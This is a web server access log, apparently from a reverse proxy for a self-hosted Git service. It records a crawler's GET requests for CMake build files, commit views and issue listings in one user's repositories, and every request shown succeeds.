"/windpacer/windpacer/blame/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/reply/codemodel-v2-9667b34a63c41f658bd0.json" [Client 74.7.227.38] [Length 12998] [Gzip 7.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/reply/codemodel-v2-9667b34a63c41f658bd0.json" -[17/Feb/2026:18:36:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/reply/codemodel-v2-9667b34a63c41f658bd0.json" [Client 74.7.227.38] [Length 9997] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/reply/codemodel-v2-9667b34a63c41f658bd0.json" -[17/Feb/2026:18:36:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/reply/codemodel-v2-9667b34a63c41f658bd0.json" [Client 74.7.227.38] [Length 9995] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/reply/codemodel-v2-9667b34a63c41f658bd0.json" -[17/Feb/2026:18:36:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/reply/codemodel-v2-9667b34a63c41f658bd0.json" [Client 74.7.227.38] [Length 12996] [Gzip 7.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/reply/codemodel-v2-9667b34a63c41f658bd0.json" -[17/Feb/2026:18:36:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/reply/codemodel-v2-9667b34a63c41f658bd0.json" [Client 74.7.227.38] [Length 9995] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/reply/codemodel-v2-9667b34a63c41f658bd0.json" -[17/Feb/2026:18:36:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/reply/codemodel-v2-9667b34a63c41f658bd0.json" [Client 74.7.227.38] [Length 1254] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/reply/codemodel-v2-9667b34a63c41f658bd0.json" -[17/Feb/2026:18:36:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" [Client 74.7.227.38] [Length 22369] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" -[17/Feb/2026:18:36:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" [Client 74.7.227.38] [Length 22369] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" -[17/Feb/2026:18:36:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/reply/target-comm_core-0294a9f898b3d3c1002f.json" [Client 74.7.227.38] [Length 15189] [Gzip 10.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/reply/target-comm_core-0294a9f898b3d3c1002f.json" -[17/Feb/2026:18:36:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/reply/target-comm_core-0294a9f898b3d3c1002f.json" [Client 74.7.227.38] [Length 15216] [Gzip 10.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/reply/target-comm_core-0294a9f898b3d3c1002f.json" -[17/Feb/2026:18:36:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" [Client 74.7.227.38] [Length 35737] [Gzip 10.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1/reply" -[17/Feb/2026:18:36:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" [Client 74.7.227.38] [Length 35734] [Gzip 10.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1/reply" -[17/Feb/2026:18:36:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" [Client 74.7.227.38] [Length 35738] [Gzip 10.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1/reply" -[17/Feb/2026:18:36:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" [Client 74.7.227.38] [Length 22369] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" -[17/Feb/2026:18:36:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/reply/codemodel-v2-9667b34a63c41f658bd0.json" [Client 74.7.227.38] [Length 1254] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/reply/codemodel-v2-9667b34a63c41f658bd0.json" -[17/Feb/2026:18:36:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/reply/cache-v2-2b34a30298af0dffde1b.json" [Client 74.7.227.38] [Length 42761] [Gzip 21.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/reply/cache-v2-2b34a30298af0dffde1b.json" -[17/Feb/2026:18:36:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/reply/codemodel-v2-9667b34a63c41f658bd0.json" [Client 74.7.227.38] [Length 13117] [Gzip 4.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/reply" -[17/Feb/2026:18:36:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/reply/cache-v2-2b34a30298af0dffde1b.json" [Client 74.7.227.38] [Length 9993] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/reply/cache-v2-2b34a30298af0dffde1b.json" -[17/Feb/2026:18:36:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/reply/codemodel-v2-9667b34a63c41f658bd0.json" [Client 74.7.227.38] [Length 13143] [Gzip 4.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/reply" -[17/Feb/2026:18:36:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/reply/target-comm_core-0294a9f898b3d3c1002f.json" [Client 74.7.227.38] [Length 15214] [Gzip 10.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/reply/target-comm_core-0294a9f898b3d3c1002f.json" -[17/Feb/2026:18:36:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/reply/codemodel-v2-9667b34a63c41f658bd0.json" [Client 74.7.227.38] [Length 1254] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/reply/codemodel-v2-9667b34a63c41f658bd0.json" -[17/Feb/2026:18:36:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" [Client 74.7.227.38] [Length 46758] [Gzip 22.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" -[17/Feb/2026:18:36:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" [Client 74.7.227.38] [Length 46756] [Gzip 22.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" -[17/Feb/2026:18:36:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" [Client 74.7.227.38] [Length 46758] [Gzip 22.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" -[17/Feb/2026:18:36:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" [Client 74.7.227.38] [Length 9983] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" -[17/Feb/2026:18:36:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" [Client 74.7.227.38] [Length 9987] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" -[17/Feb/2026:18:36:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" [Client 74.7.227.38] [Length 9986] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" -[17/Feb/2026:18:36:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/reply/codemodel-v2-9667b34a63c41f658bd0.json?display=rendered" [Client 74.7.227.38] [Length 11141] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/reply/codemodel-v2-9667b34a63c41f658bd0.json" -[17/Feb/2026:18:36:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/reply/codemodel-v2-9667b34a63c41f658bd0.json" [Client 74.7.227.38] [Length 12975] [Gzip 7.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/reply/codemodel-v2-9667b34a63c41f658bd0.json" -[17/Feb/2026:18:36:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/reply/codemodel-v2-9667b34a63c41f658bd0.json" [Client 74.7.227.38] [Length 12998] [Gzip 7.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/reply/codemodel-v2-9667b34a63c41f658bd0.json" -[17/Feb/2026:18:36:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/reply/codemodel-v2-9667b34a63c41f658bd0.json" [Client 74.7.227.38] [Length 9996] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/reply/codemodel-v2-9667b34a63c41f658bd0.json" -[17/Feb/2026:18:37:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/reply/codemodel-v2-9667b34a63c41f658bd0.json" [Client 74.7.227.38] [Length 9973] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/reply/codemodel-v2-9667b34a63c41f658bd0.json" -[17/Feb/2026:18:37:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" [Client 74.7.227.38] [Length 22369] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" -[17/Feb/2026:18:37:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" [Client 74.7.227.38] [Length 22369] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" -[17/Feb/2026:18:37:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/reply/codemodel-v2-9667b34a63c41f658bd0.json" [Client 74.7.227.38] [Length 1254] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/reply/codemodel-v2-9667b34a63c41f658bd0.json" -[17/Feb/2026:18:37:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/reply/codemodel-v2-9667b34a63c41f658bd0.json" [Client 74.7.227.38] [Length 1254] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/reply/codemodel-v2-9667b34a63c41f658bd0.json" -[17/Feb/2026:18:37:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" [Client 74.7.227.38] [Length 22369] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" -[17/Feb/2026:18:37:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" [Client 74.7.227.38] [Length 35736] [Gzip 10.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1/reply" -[17/Feb/2026:18:37:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10256] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&project=-1&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:18:37:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10254] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" -[17/Feb/2026:18:37:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?files=OpcUaMinimal%2fTestService%2fTestService.csproj" [Client 74.7.227.38] [Length 21834] [Gzip 3.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/TestService.csproj" -[17/Feb/2026:18:37:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?milestone=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10019] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?milestone=-1&sort=latest&state=all&type=all" -[17/Feb/2026:18:37:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/logs/proxy-host-2_error.log?display=rendered" [Client 74.7.227.38] [Length 11169] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/proxy-host-2_error.log" -[17/Feb/2026:18:37:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake?display=source" [Client 74.7.227.38] [Length 11612] [Gzip 3.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" 